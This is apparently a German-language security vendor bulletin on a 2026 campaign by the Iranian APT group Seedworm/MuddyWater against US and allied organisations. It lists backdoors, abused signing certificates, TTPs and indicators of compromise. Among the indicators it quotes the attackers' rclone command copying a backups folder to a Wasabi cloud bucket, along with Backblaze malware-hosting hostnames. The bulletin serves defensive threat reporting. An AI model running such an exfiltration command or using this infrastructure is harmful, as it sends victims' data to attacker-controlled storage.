Anfang dieser Woche haben wir einen Blogbeitrag über die Cyber-Affären inmitten des amerikanisch-israelischen Krieges gegen den Iran mit dem Titel Operation Epic Fury geschrieben. Darin stellten wir fest, dass es als Vergeltung für diese Angriffe eine verstärkte Reaktion von staatlich geförderten Bedrohungsakteuren gegen westliche Organisationen mit einer Präsenz im Nahen Osten geben würde.

Jüngste Analysen von Bedrohungsforschern zeigen jedoch eine bemerkenswerte Zunahme bösartiger Cyber-Aktivitäten seit unserem letzten Blog-Beitrag, die der vom iranischen Staat gesponserten Advanced Persistent Threat (APT)-Gruppe Seedworm (auch bekannt als MuddyWater, Temp Zagros oder Static Kitten) zugeschrieben werden. Diese Aktivitäten haben mehrere US-Organisationen in kritischen Sektoren direkt betroffen und stehen im Einklang mit den erhöhten geopolitischen Spannungen nach den jüngsten Militäraktionen im Nahen Osten.

Die wichtigsten Erkenntnisse -

1. Angeschlagene US-amerikanische und verbündete Organisationen

Seedworm-Aktivitäten, die erstmals Anfang Februar 2026 entdeckt wurden, sind in mehreren hochwertigen Netzwerken beobachtet worden:
- Eine US-Bank
- Ein amerikanischer Flughafen
- Ein amerikanisches Software-Unternehmen (mit israelischer Präsenz)
- Gemeinnützige Organisationen in den USA und Kanada
Diese Angriffe wurden bis Anfang März fortgesetzt, was auf eine aktive und laufende Kampagne hindeutet.

2. Neu identifizierte Backdoors und Malware

Die Forscher identifizierten mehrere Malware-Familien, die in den Umgebungen der Opfer eingesetzt werden:
- Dindoor-Backdoor:
o Bislang unbekannt
o Verwendet die Deno JavaScript/TypeScript-Laufzeitumgebung
o Wurde in der israelischen Niederlassung des angegriffenen Softwareunternehmens, einer US-Bank und einer kanadischen gemeinnützigen Organisation gefunden
o Signiert mit einem auf "Amy Cherne" ausgestellten Zertifikat
- Fakeset-Backdoor (Python-basiert):
o Gefunden auf dem US-Flughafen und einer anderen gemeinnützigen Organisation
o Signiert mit Zertifikaten, die auf "Amy Cherne" und "Donald Gay" ausgestellt sind (zuvor in der Seedworm-Malware verwendet)
- Stagecomp → Darkcomp-Malware-Kette:
o Ebenfalls signiert mit dem "Donald Gay"-Zertifikat
o Wird von großen Anbietern wie Google, Microsoft und Kaspersky mit Seedworm in Verbindung gebracht
Diese Malware-Implantate zeigen ein vielfältiges Toolset und deuten auf gezielte Angriffe auf die Lieferkette, den Finanzsektor und kritische Infrastrukturen hin.

3. Versuche der Datenexfiltration

In mindestens einem Fall versuchten die Angreifer, Daten des angegriffenen Softwareunternehmens mit Hilfe von Rclone in einen Wasabi-Cloud-Speicher zu exfiltrieren, wobei der Erfolg dieses Versuchs unbestätigt bleibt.

4. Infrastruktur und Verbreitung

- Die Verbreitung der Malware erfolgte über Backblaze-Cloud-Speicher-Server, was darauf hindeutet, dass Seedworm eine seriöse Cloud-Infrastruktur für die Command-and-Control und die Verteilung der Nutzdaten nutzt.
- Die Verwendung von Codesigning-Zertifikaten (einschließlich zuvor beobachteter bösartiger Zertifikate) deutet auf einen anhaltenden Versuch hin, legitim zu erscheinen und die Erkennung zu umgehen.

TTPs (Taktiken, Techniken und Verfahren) & IOCs (Indikatoren für eine Gefährdung)

MuddyWater entwickelt sich ständig weiter, um der Erkennung zu entgehen, und nutzt dabei eine Mischung aus benutzerdefinierter Malware und Techniken, die sich von der Außenwelt abheben.

- Erster Zugriff:Verwendet in erster Linie Spearphishing mit makroaktivierten Dokumenten (ZIP, PDF, XLSM) und nutzt dabei oft Köder wie gefälschte Stellenangebote.
- Ausführung & Persistenz:Verwendet in hohem Maße verschleierte PowerShell, DLL-Side-Loading (z. B. goopdate.dll) und RMM-Tools wie Atera oder ScreenConnect. Sie kompilieren häufig Code auf den Zielcomputern, um eine dateibasierte Erkennung zu vermeiden.
- Malware-Arsenal:Setzt Tools wie POWERSTATS, Mori, Canopy (Starwhale), MuddyRot, UDPGangster und Phoenix ein.
- Verteidigungsumgehung:Setzt Anti-Analyse/Anti-Forensik ein, einschließlich Sandbox-Erkennung und Log-Clearing.
Jüngste Kampagnen und Entwicklungen (2025-2026)
- Operation Olalampo (Februar 2026):Zielt auf hochrangige Einrichtungen ab.
- Zielgruppen:Laufende Kampagnen zielen auf Finanz-/Regierungseinrichtungen im Westen und im Nahen Osten ab.
- Mobil:In Verbindung mit DCHSpy, einer modularen Android-Spionagesoftware.


Aktuelle und frühere TTPs und beobachtete -

1. Malware-Familien/Hintertüren

Diese Malware-Familien wurden in mehreren US-amerikanischen, kanadischen und israelischen Opfernetzwerken beobachtet:
- Dindoor Backdoor - eine bisher unbekannte Backdoor, die die Deno JavaScript/TypeScript-Laufzeitumgebung nutzt.
- Fakeset Backdoor - Python-basierte Backdoor, die in US-Flughäfen und gemeinnützigen Netzwerken eingesetzt wird.
- Stagecomp Loader → Darkcomp Backdoor - Stagecomp legt Darkcomp ab und lädt es; wird von Google, Microsoft und Kaspersky mit Seedworm in Verbindung gebracht.

2. Bösartige Code-Signatur-Zertifikate

Seedworm ist dafür bekannt, dass er betrügerische oder gefährdete Code-Signatur-Zertifikate missbraucht. Die folgenden wurden direkt mit dieser Kampagne in Verbindung gebracht:
- Zertifikat ausgestellt auf "Amy Cherne" - verwendet zum Signieren der Backdoors Dindoor und Fakeset.
- Zertifikat ausgestellt auf "Donald Gay" - verwendet zum Signieren von Fakeset- und Stagecomp-Malware, die bereits bei Seedworm-Aktivitäten beobachtet wurde.

3. Bösartige oder verdächtige Infrastruktur

Hosting von Nutzdaten (Backblaze B2 Cloud Storage)
Wird als Malware-Verteilungsserver verwendet:
- gitempire.s3.us-east-005.backblazeb2.com
- elvenforest.s3.us-east-005.backblazeb2.com
Ziel der Datenexfiltration (Rclone zu Wasabi Cloud Storage)
- Versuchte Exfiltration mittels:
rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[REMOVED]:/192.168.0.x


Was zeigt dies an?

Diese Kampagne zeigt die klare Absicht iranischer Bedrohungsakteure, die Netzwerke der USA und ihrer Verbündeten in den Bereichen Finanzen, Luftfahrt, Software und gemeinnützige Organisationen zu infiltrieren. Die Kombination aus neuen Hintertüren, bekannten Malware-Familien, cloudbasiertem C2 und versuchter Exfiltration deutet auf einen mehrstufigen operativen Ansatz hin, der wahrscheinlich auf langfristigen Zugang, Spionage oder künftige Störaktionen abzielt.

Wenn Sie sich über eine der in diesem Bulletin beschriebenen Bedrohungen Sorgen machen oder Hilfe benötigen, um herauszufinden, welche Schritte Sie unternehmen sollten, um sich vor den größten Bedrohungen für Ihr Unternehmen zu schützen, wenden Sie sich bitte an Ihren Kundenbetreuer odernehmen Sie Kontakt auf, um zu erfahren, wie Sie Ihr Unternehmen schützen können.